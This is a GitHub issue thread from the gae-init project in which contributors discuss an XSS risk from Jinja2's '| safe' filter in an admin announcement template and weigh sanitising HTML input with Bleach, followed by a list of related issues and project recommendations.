Comments (6)
Yes I'm aware of that and the reason that I didn't want to escape or treat it with care is because, sometimes you want to add links or make something strong
or have a header
.. and as you mentioned from the admin console you can do a lot of bad things so you better be careful who is admin and who is not :)
from gae-init.
Understand and no problem there. However, I want to use HTML input elsewhere too; and there I will need to sanitize the user input; thinking of adding Bleach (possibly in combo with either CKEditor or TinyMCE).
Unless you tell me that we already have some "cleaner" build into gae-init ?
from gae-init.
Well by default Jinja2 is escaping the variables and unless you're explicitly saying that it's safe (at your own risk) it won't escape them..
Just remove the | safe
filter there and you'll see...
https://github.com/gae-init/gae-init/blob/master/main/templates/bit/announcement.html#L4
You can read more about it here: http://jinja.pocoo.org/docs/templates/#html-escaping
from gae-init.
Sure, but I want to render the user input HTML ... thus I need to clean it on input.
BTW: I'm okay with this being "my" problem, in that gae-init will not dictate a particular approach to this issue.
from gae-init.
If you have the user input and it's actually HTML but you still want to be a bit safe then I guess you'll have to make some research on what exactly suits your needs.. if it's going to be client side or server side... if it's going to clean up some HTML tags or just escape them etc..
But if you're between CKEditor or TineMCE I would suggest you go with the CKEditor, because I played with TinyMCE in the past and it's pain... CK looks more robust and produces a friendlier HTML and cooler features..
from gae-init.
As said in closing #61 "Fixed XSS vulnerability in Admin Config": yes, it is important to avoid/fix XSS vulnerabilities in your final product; the PR #61 hints at one such approach (using https://github.com/jsocol/bleach and https://github.com/html5lib/html5lib-python) and will resolve the issue. However, gae-init
does not need to mandate this particular solution.
from gae-init.
Related Issues (20)
- Google login is not working (not GAE) HOT 1
- AttributeError: 'module' object has no attribute 'get_dbs'
- gulp-help is a blocker to upgrading to gulp4 HOT 2
- Yarn doesn't work with Node v12 HOT 3
- Use of memcache is a blocker to Python 3.7 migration HOT 5
- Trouble running gulp for local testing with grpcio in app.yaml HOT 4
- Can't import numpy HOT 7
- Error with virtualenv unrecognized argument during yarn install
- Requirement for email_validator on local test run not satisfied? HOT 4
- Race condition in deploy vs creation of lib.zip HOT 2
- Inconsistencies in gulpfile task descriptions HOT 3
- Add Twitch Login
- Upgrade to Font Awesome 5
- plan to update to python 3? HOT 1
- Moment.js is a legacy project HOT 1
- Dependabot couldn't authenticate with https://pypi.python.org/simple/
- Import error with latest changes HOT 1
- Travis not running
- Improve cleanup in development HOT 1
- gae-init.appspot.com is down
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from gae-init.